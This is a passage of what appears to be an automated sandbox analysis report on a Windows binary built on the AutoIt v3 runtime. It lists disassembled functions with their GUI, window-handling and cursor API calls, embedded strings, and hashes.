                                                      • RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 0088A9B0
                                                      • GetWindowLongW.USER32(00000000,000000F0), ref: 0088A9C5
                                                      • SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 0088A9ED
                                                      • GetWindowTextW.USER32(00000000,00000000,00000001), ref: 0088AA14
                                                      • InflateRect.USER32(?,000000FD,000000FD), ref: 0088AA32
                                                      • DrawFocusRect.USER32(?,?), ref: 0088AA3D
                                                      • GetSysColor.USER32(00000011), ref: 0088AA4B
                                                      • SetTextColor.GDI32(?,00000000), ref: 0088AA53
                                                      • DrawTextW.USER32(?,00000000,000000FF,?,?), ref: 0088AA67
                                                      • SelectObject.GDI32(?,0088A5FA), ref: 0088AA7E
                                                      • DeleteObject.GDI32(?), ref: 0088AA89
                                                      • SelectObject.GDI32(?,?), ref: 0088AA8F
                                                      • DeleteObject.GDI32(?), ref: 0088AA94
                                                      • SetTextColor.GDI32(?,?), ref: 0088AA9A
                                                      • SetBkColor.GDI32(?,?), ref: 0088AAA4
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.457479452.0000000000801000.00000040.00000001.01000000.00000005.sdmp, Offset: 00800000, based on PE: true
                                                      • Associated: 00000005.00000002.457476649.0000000000800000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457479452.00000000008B4000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457479452.00000000008BE000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457479452.00000000008C8000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457479452.0000000000947000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457505358.000000000094D000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457508098.000000000094E000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457518436.00000000009C2000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457522524.00000000009C3000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_800000_kudo.jbxd
                                                      Similarity
                                                      • API ID: Color$Object$Text$RectSelect$BrushCreateDeleteDrawInflateWindow$FocusLongMessageRoundSendSolid
                                                      • String ID:
                                                      • API String ID: 1996641542-0
                                                      • Opcode ID: acfde702c0edeb5a0763ce1e37dd4000dd0acbaa0fa47182b3df4b4a1826d203
                                                      • Instruction ID: 69e9e9da768e8a1410f049a82d1915d89fa2293f5bdb211c0177e05359d08ba3
                                                      • Opcode Fuzzy Hash: acfde702c0edeb5a0763ce1e37dd4000dd0acbaa0fa47182b3df4b4a1826d203
                                                      • Instruction Fuzzy Hash: 6E512E75901218EFDB119FA8DC48EAE7B79FF08320F114626FA11EB2A2D7759940DF50
                                                      Function 008889D5 Relevance: 38.9, APIs: 21, Strings: 1, Instructions: 401windowCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • SendMessageW.USER32(?,00000158,000000FF,0000014E), ref: 00888AC1
                                                      • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00888AD2
                                                      • CharNextW.USER32(0000014E), ref: 00888B01
                                                      • SendMessageW.USER32(?,0000014B,00000000,00000000), ref: 00888B42
                                                      • SendMessageW.USER32(?,00000158,000000FF,00000158), ref: 00888B58
                                                      • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00888B69
                                                      • SendMessageW.USER32(?,000000C2,00000001,0000014E), ref: 00888B86
                                                      • SetWindowTextW.USER32(?,0000014E), ref: 00888BD8
                                                      • SendMessageW.USER32(?,000000B1,000F4240,000F423F), ref: 00888BEE
                                                      • SendMessageW.USER32(?,00001002,00000000,?), ref: 00888C1F
                                                      • _memset.LIBCMT ref: 00888C44
                                                      • SendMessageW.USER32(00000000,00001060,00000001,00000004), ref: 00888C8D
                                                      • _memset.LIBCMT ref: 00888CEC
                                                      • SendMessageW.USER32(?,00001053,000000FF,?), ref: 00888D16
                                                      • SendMessageW.USER32(?,00001074,?,00000001), ref: 00888D6E
                                                      • SendMessageW.USER32(?,0000133D,?,?), ref: 00888E1B
                                                      • InvalidateRect.USER32(?,00000000,00000001), ref: 00888E3D
                                                      • GetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 00888E87
                                                      • SetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 00888EB4
                                                      • DrawMenuBar.USER32(?), ref: 00888EC3
                                                      • SetWindowTextW.USER32(?,0000014E), ref: 00888EEB
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.457479452.0000000000801000.00000040.00000001.01000000.00000005.sdmp, Offset: 00800000, based on PE: true
                                                      • Associated: 00000005.00000002.457476649.0000000000800000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457479452.00000000008B4000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457479452.00000000008BE000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457479452.00000000008C8000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457479452.0000000000947000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457505358.000000000094D000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457508098.000000000094E000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457518436.00000000009C2000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457522524.00000000009C3000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_800000_kudo.jbxd
                                                      Similarity
                                                      • API ID: MessageSend$Menu$InfoItemTextWindow_memset$CharDrawInvalidateNextRect
                                                      • String ID: 0
                                                      • API String ID: 1073566785-4108050209
                                                      • Opcode ID: 02ec915a1aaf43f381c13b7c0d3854164a28897f6a36b3804996973ea4cd86c0
                                                      • Instruction ID: 92de10854ed4734378ecca118249076f64553348cbcd70c3b31be8cfdd00b29d
                                                      • Opcode Fuzzy Hash: 02ec915a1aaf43f381c13b7c0d3854164a28897f6a36b3804996973ea4cd86c0
                                                      • Instruction Fuzzy Hash: 47E14C74900218EADB20EF54CC84EEE7BB9FF05720F50815AFA15EA291DB749980DF61
                                                      Function 0088488F Relevance: 37.0, APIs: 18, Strings: 3, Instructions: 290windowCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • GetCursorPos.USER32(?), ref: 008849CA
                                                      • GetDesktopWindow.USER32 ref: 008849DF
                                                      • GetWindowRect.USER32(00000000), ref: 008849E6
                                                      • GetWindowLongW.USER32(?,000000F0), ref: 00884A48
                                                      • DestroyWindow.USER32(?), ref: 00884A74
                                                      • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,00000003,80000000,80000000,80000000,80000000,00000000,00000000,00000000,00000000), ref: 00884A9D
                                                      • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 00884ABB
                                                      • SendMessageW.USER32(?,00000439,00000000,00000030), ref: 00884AE1
                                                      • SendMessageW.USER32(?,00000421,?,?), ref: 00884AF6
                                                      • SendMessageW.USER32(?,0000041D,00000000,00000000), ref: 00884B09
                                                      • IsWindowVisible.USER32(?), ref: 00884B29
                                                      • SendMessageW.USER32(?,00000412,00000000,D8F0D8F0), ref: 00884B44
                                                      • SendMessageW.USER32(?,00000411,00000001,00000030), ref: 00884B58
                                                      • GetWindowRect.USER32(?,?), ref: 00884B70
                                                      • MonitorFromPoint.USER32(?,?,00000002), ref: 00884B96
                                                      • GetMonitorInfoW.USER32(00000000,?), ref: 00884BB0
                                                      • CopyRect.USER32(?,?), ref: 00884BC7
                                                      • SendMessageW.USER32(?,00000412,00000000), ref: 00884C32
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.457479452.0000000000801000.00000040.00000001.01000000.00000005.sdmp, Offset: 00800000, based on PE: true
                                                      • Associated: 00000005.00000002.457476649.0000000000800000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457479452.00000000008B4000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457479452.00000000008BE000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457479452.00000000008C8000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457479452.0000000000947000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457505358.000000000094D000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457508098.000000000094E000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457518436.00000000009C2000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457522524.00000000009C3000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_800000_kudo.jbxd
                                                      Similarity
                                                      • API ID: MessageSendWindow$Rect$Monitor$CopyCreateCursorDesktopDestroyFromInfoLongPointVisible
                                                      • String ID: ($0$tooltips_class32
                                                      • API String ID: 698492251-4156429822
                                                      • Opcode ID: aa10892e476575e8d0287f2a3cdfef7a16e189d915e374387b61fe0e1188a134
                                                      • Instruction ID: 6483b6cf7c3bebc3dc8c99327acda86cf556ee9d2a5ffefd030773312bcd0766
                                                      • Opcode Fuzzy Hash: aa10892e476575e8d0287f2a3cdfef7a16e189d915e374387b61fe0e1188a134
                                                      • Instruction Fuzzy Hash: 88B17B72604351AFDB44EF68C845B6ABBE4FF88314F008A1CF599DB2A2D771E805CB56
                                                      Function 008027D9 Relevance: 33.5, APIs: 18, Strings: 1, Instructions: 286windowtimeCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 008028BC
                                                      • GetSystemMetrics.USER32(00000007), ref: 008028C4
                                                      • SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 008028EF
                                                      • GetSystemMetrics.USER32(00000008), ref: 008028F7
                                                      • GetSystemMetrics.USER32(00000004), ref: 0080291C
                                                      • SetRect.USER32(000000FF,00000000,00000000,000000FF,000000FF), ref: 00802939
                                                      • AdjustWindowRectEx.USER32(000000FF,?,00000000,?), ref: 00802949
                                                      • CreateWindowExW.USER32(?,AutoIt v3 GUI,?,?,?,000000FF,000000FF,000000FF,?,00000000,00000000), ref: 0080297C
                                                      • SetWindowLongW.USER32(00000000,000000EB,00000000), ref: 00802990
                                                      • GetClientRect.USER32(00000000,000000FF), ref: 008029AE
                                                      • GetStockObject.GDI32(00000011), ref: 008029CA
                                                      • SendMessageW.USER32(00000000,00000030,00000000), ref: 008029D5
                                                        • Part of subcall function 00802344: GetCursorPos.USER32(?), ref: 00802357
                                                        • Part of subcall function 00802344: ScreenToClient.USER32(008C57B0,?), ref: 00802374
                                                        • Part of subcall function 00802344: GetAsyncKeyState.USER32(00000001), ref: 00802399
                                                        • Part of subcall function 00802344: GetAsyncKeyState.USER32(00000002), ref: 008023A7
                                                      • SetTimer.USER32(00000000,00000000,00000028,00801256), ref: 008029FC
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.457479452.0000000000801000.00000040.00000001.01000000.00000005.sdmp, Offset: 00800000, based on PE: true
                                                      • Associated: 00000005.00000002.457476649.0000000000800000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457479452.00000000008B4000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457479452.00000000008BE000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457479452.00000000008C8000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457479452.0000000000947000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457505358.000000000094D000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457508098.000000000094E000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457518436.00000000009C2000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457522524.00000000009C3000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_800000_kudo.jbxd
                                                      Similarity
                                                      • API ID: System$MetricsRectWindow$AsyncClientInfoParametersState$AdjustCreateCursorLongMessageObjectScreenSendStockTimer
                                                      • String ID: AutoIt v3 GUI
                                                      • API String ID: 1458621304-248962490
                                                      • Opcode ID: b9b0d22e7542785093ab5e284fbf1619ffa4cbd65014340a8849e62bd7fa2bcf
                                                      • Instruction ID: d08672f8948900efd2ba076a23b9a39050514dc9c53a7e60640e02e74ff54de7
                                                      • Opcode Fuzzy Hash: b9b0d22e7542785093ab5e284fbf1619ffa4cbd65014340a8849e62bd7fa2bcf
                                                      • Instruction Fuzzy Hash: 5BB14A75A0060AEFDB54DFA8DC49BAE7BB4FB48314F104229FA15E62E0DB74A850CB50
                                                      Function 0086449A Relevance: 33.4, APIs: 14, Strings: 5, Instructions: 179COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.457479452.0000000000801000.00000040.00000001.01000000.00000005.sdmp, Offset: 00800000, based on PE: true
                                                      • Associated: 00000005.00000002.457476649.0000000000800000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457479452.00000000008B4000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457479452.00000000008BE000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457479452.00000000008C8000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457479452.0000000000947000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457505358.000000000094D000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457508098.000000000094E000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457518436.00000000009C2000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457522524.00000000009C3000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_800000_kudo.jbxd
                                                      Similarity
                                                      • API ID: _wcscat$_wcscmp_wcscpy_wcsncpy_wcsstr
                                                      • String ID: %u.%u.%u.%u$04090000$DefaultLangCodepage$StringFileInfo\$\VarFileInfo\Translation
                                                      • API String ID: 3576275495-1459072770
                                                      • Opcode ID: dd01ca15b16f0aa340a2db57e1fb66a9bd6e1cef61a702c14fa708124ffce637
                                                      • Instruction ID: 1e2636e551779627ba7d69f8f6ee9091ef460183acd70b83590449fd2274bd63
                                                      • Opcode Fuzzy Hash: dd01ca15b16f0aa340a2db57e1fb66a9bd6e1cef61a702c14fa708124ffce637
                                                      • Instruction Fuzzy Hash: 7E41F9715002247BE715BA78DC47EBF776CFF52710F000066FA05E6283EA74998197A6
                                                      Function 0085A439 Relevance: 26.5, APIs: 14, Strings: 1, Instructions: 273windowtimeCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • GetClassNameW.USER32(?,?,00000100), ref: 0085A47A
                                                      • __swprintf.LIBCMT ref: 0085A51B
                                                      • _wcscmp.LIBCMT ref: 0085A52E
                                                      • SendMessageTimeoutW.USER32(?,?,00000101,00000000,00000002,00001388,?), ref: 0085A583
                                                      • _wcscmp.LIBCMT ref: 0085A5BF
                                                      • GetClassNameW.USER32(?,?,00000400), ref: 0085A5F6
                                                      • GetDlgCtrlID.USER32(?), ref: 0085A648
                                                      • GetWindowRect.USER32(?,?), ref: 0085A67E
                                                      • GetParent.USER32(?), ref: 0085A69C
                                                      • ScreenToClient.USER32(00000000), ref: 0085A6A3
                                                      • GetClassNameW.USER32(?,?,00000100), ref: 0085A71D
                                                      • _wcscmp.LIBCMT ref: 0085A731
                                                      • GetWindowTextW.USER32(?,?,00000400), ref: 0085A757
                                                      • _wcscmp.LIBCMT ref: 0085A76B
                                                        • Part of subcall function 0082362C: _iswctype.LIBCMT ref: 00823634
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.457479452.0000000000801000.00000040.00000001.01000000.00000005.sdmp, Offset: 00800000, based on PE: true
                                                      • Associated: 00000005.00000002.457476649.0000000000800000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457479452.00000000008B4000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457479452.00000000008BE000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457479452.00000000008C8000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457479452.0000000000947000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457505358.000000000094D000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457508098.000000000094E000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457518436.00000000009C2000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457522524.00000000009C3000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_800000_kudo.jbxd
                                                      Similarity
                                                      • API ID: _wcscmp$ClassName$Window$ClientCtrlMessageParentRectScreenSendTextTimeout__swprintf_iswctype
                                                      • String ID: %s%u
                                                      • API String ID: 3744389584-679674701
                                                      • Opcode ID: adde86c6d6ec24c1ababc20156c01d1bc15ed8f6aac4ecd0f963ba575c8cfc7c
                                                      • Instruction ID: 5f59669db69890bfcb92bea9f6d9fb15813f8ae852bb8feb68a4d4efe0ddc1a6
                                                      • Opcode Fuzzy Hash: adde86c6d6ec24c1ababc20156c01d1bc15ed8f6aac4ecd0f963ba575c8cfc7c
                                                      • Instruction Fuzzy Hash: BBA1D371204206AFDB18DF64C8C4FAAB7E8FF58316F044629FD99D2191DB30E959CB92
                                                      Function 0085AED4 Relevance: 26.5, APIs: 13, Strings: 2, Instructions: 249COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • GetClassNameW.USER32(00000008,?,00000400), ref: 0085AF18
                                                      • _wcscmp.LIBCMT ref: 0085AF29
                                                      • GetWindowTextW.USER32(00000001,?,00000400), ref: 0085AF51
                                                      • CharUpperBuffW.USER32(?,00000000), ref: 0085AF6E
                                                      • _wcscmp.LIBCMT ref: 0085AF8C
                                                      • _wcsstr.LIBCMT ref: 0085AF9D
                                                      • GetClassNameW.USER32(00000018,?,00000400), ref: 0085AFD5
                                                      • _wcscmp.LIBCMT ref: 0085AFE5
                                                      • GetWindowTextW.USER32(00000002,?,00000400), ref: 0085B00C
                                                      • GetClassNameW.USER32(00000018,?,00000400), ref: 0085B055
                                                      • _wcscmp.LIBCMT ref: 0085B065
                                                      • GetClassNameW.USER32(00000010,?,00000400), ref: 0085B08D
                                                      • GetWindowRect.USER32(00000004,?), ref: 0085B0F6
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.457479452.0000000000801000.00000040.00000001.01000000.00000005.sdmp, Offset: 00800000, based on PE: true
                                                      • Associated: 00000005.00000002.457476649.0000000000800000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457479452.00000000008B4000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457479452.00000000008BE000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457479452.00000000008C8000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457479452.0000000000947000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457505358.000000000094D000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457508098.000000000094E000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457518436.00000000009C2000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457522524.00000000009C3000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_800000_kudo.jbxd
                                                      Similarity
                                                      • API ID: ClassName_wcscmp$Window$Text$BuffCharRectUpper_wcsstr
                                                      • String ID: @$ThumbnailClass
                                                      • API String ID: 1788623398-1539354611
                                                      • Opcode ID: 9194e6a6b2acee62d4bfb9079c4eac18196a9a98b6e1e6d185f7bb5fabe132c7
                                                      • Instruction ID: 762efbc9185265b5467c7ecaa93f36708dca4435f189af600eedc02ab1d8605d
                                                      • Opcode Fuzzy Hash: 9194e6a6b2acee62d4bfb9079c4eac18196a9a98b6e1e6d185f7bb5fabe132c7
                                                      • Instruction Fuzzy Hash: 0F81AF711082099FDB05DF14C891BAA7BE8FF64316F14856AFD85CA092DB34DD8DCBA2
                                                      Function 0085ABD4 Relevance: 26.4, APIs: 3, Strings: 12, Instructions: 105COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.457479452.0000000000801000.00000040.00000001.01000000.00000005.sdmp, Offset: 00800000, based on PE: true
                                                      • Associated: 00000005.00000002.457476649.0000000000800000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457479452.00000000008B4000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457479452.00000000008BE000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457479452.00000000008C8000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457479452.0000000000947000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457505358.000000000094D000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457508098.000000000094E000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457518436.00000000009C2000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457522524.00000000009C3000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_800000_kudo.jbxd
                                                      Similarity
                                                      • API ID: __wcsnicmp
                                                      • String ID: ACTIVE$ALL$CLASSNAME=$HANDLE=$LAST$REGEXP=$[ACTIVE$[ALL$[CLASS:$[HANDLE:$[LAST$[REGEXPTITLE:
                                                      • API String ID: 1038674560-1810252412
                                                      • Opcode ID: d802b46527b4611e9239a5debb86e9660842080b2ad12a3914d81d54b10a4fdb
                                                      • Instruction ID: 38221812aec68d045c01148f71e7176f53a51ff5d99ce45a5f6a16ad26650880
                                                      • Opcode Fuzzy Hash: d802b46527b4611e9239a5debb86e9660842080b2ad12a3914d81d54b10a4fdb
                                                      • Instruction Fuzzy Hash: DB31B031948319AADB58FA68ED93EEE7764FF10711F600528F812F12D1EB656F088653
                                                      Function 00874FFD Relevance: 25.6, APIs: 17, Instructions: 110COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • LoadCursorW.USER32(00000000,00007F8A), ref: 00875013
                                                      • LoadCursorW.USER32(00000000,00007F00), ref: 0087501E
                                                      • LoadCursorW.USER32(00000000,00007F03), ref: 00875029
                                                      • LoadCursorW.USER32(00000000,00007F8B), ref: 00875034
                                                      • LoadCursorW.USER32(00000000,00007F01), ref: 0087503F
                                                      • LoadCursorW.USER32(00000000,00007F81), ref: 0087504A
                                                      • LoadCursorW.USER32(00000000,00007F88), ref: 00875055
                                                      • LoadCursorW.USER32(00000000,00007F80), ref: 00875060
                                                      • LoadCursorW.USER32(00000000,00007F86), ref: 0087506B
                                                      • LoadCursorW.USER32(00000000,00007F83), ref: 00875076
                                                      • LoadCursorW.USER32(00000000,00007F85), ref: 00875081
                                                      • LoadCursorW.USER32(00000000,00007F82), ref: 0087508C
                                                      • LoadCursorW.USER32(00000000,00007F84), ref: 00875097
                                                      • LoadCursorW.USER32(00000000,00007F04), ref: 008750A2
                                                      • LoadCursorW.USER32(00000000,00007F02), ref: 008750AD
                                                      • LoadCursorW.USER32(00000000,00007F89), ref: 008750B8
                                                      • GetCursorInfo.USER32(?), ref: 008750C8
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.457479452.0000000000801000.00000040.00000001.01000000.00000005.sdmp, Offset: 00800000, based on PE: true
                                                      • Associated: 00000005.00000002.457476649.0000000000800000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457479452.00000000008B4000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457479452.00000000008BE000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457479452.00000000008C8000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457479452.0000000000947000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457505358.000000000094D000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457508098.000000000094E000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457518436.00000000009C2000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457522524.00000000009C3000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_800000_kudo.jbxd
                                                      Similarity
                                                      • API ID: Cursor$Load$Info
                                                      • String ID:
                                                      • API String ID: 2577412497-0
                                                      • Opcode ID: 1c49d96d8dfe0574f075f1f529088c1278057ac2f4c305b1f5dbe0deb1bb4c7b
                                                      • Instruction ID: 40e3443878cb3b846d6bdc1405e741317295f8937d2bb12f17ee2613ef9ea7e6
                                                      • Opcode Fuzzy Hash: 1c49d96d8dfe0574f075f1f529088c1278057ac2f4c305b1f5dbe0deb1bb4c7b
                                                      • Instruction Fuzzy Hash: 9D3112B1D0831DAADF509FB68C8996EBFE8FF04750F50453AE50DE7281DA78A5008FA1
                                                      Function 0088A1B9 Relevance: 24.7, APIs: 12, Strings: 2, Instructions: 205windowCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • _memset.LIBCMT ref: 0088A259
                                                      • DestroyWindow.USER32(?), ref: 0088A2D3
                                                        • Part of subcall function 00807BCC: _memmove.LIBCMT ref: 00807C06
                                                      • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,00000000,?), ref: 0088A34D
                                                      • SendMessageW.USER32(00000000,00000433,00000000,00000030), ref: 0088A36F
                                                      • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 0088A382
                                                      • DestroyWindow.USER32(00000000), ref: 0088A3A4
                                                      • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,00800000,00000000), ref: 0088A3DB
                                                      • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 0088A3F4
                                                      • GetDesktopWindow.USER32 ref: 0088A40D
                                                      • GetWindowRect.USER32(00000000), ref: 0088A414
                                                      • SendMessageW.USER32(00000000,00000418,00000000,?), ref: 0088A42C
                                                      • SendMessageW.USER32(00000000,00000421,?,00000000), ref: 0088A444
                                                        • Part of subcall function 008025DB: GetWindowLongW.USER32(?,000000EB), ref: 008025EC
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.457479452.0000000000801000.00000040.00000001.01000000.00000005.sdmp, Offset: 00800000, based on PE: true
                                                      • Associated: 00000005.00000002.457476649.0000000000800000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457479452.00000000008B4000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457479452.00000000008BE000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457479452.00000000008C8000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457479452.0000000000947000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457505358.000000000094D000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457508098.000000000094E000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457518436.00000000009C2000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457522524.00000000009C3000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_800000_kudo.jbxd
                                                      Similarity
                                                      • API ID: Window$MessageSend$CreateDestroy$DesktopLongRect_memmove_memset
                                                      • String ID: 0$tooltips_class32
                                                      • API String ID: 1297703922-3619404913
                                                      • Opcode ID: 949e23ba17ed6d92d001fc079a23e2c4b2d090435f941c647d4bcd62dff62052
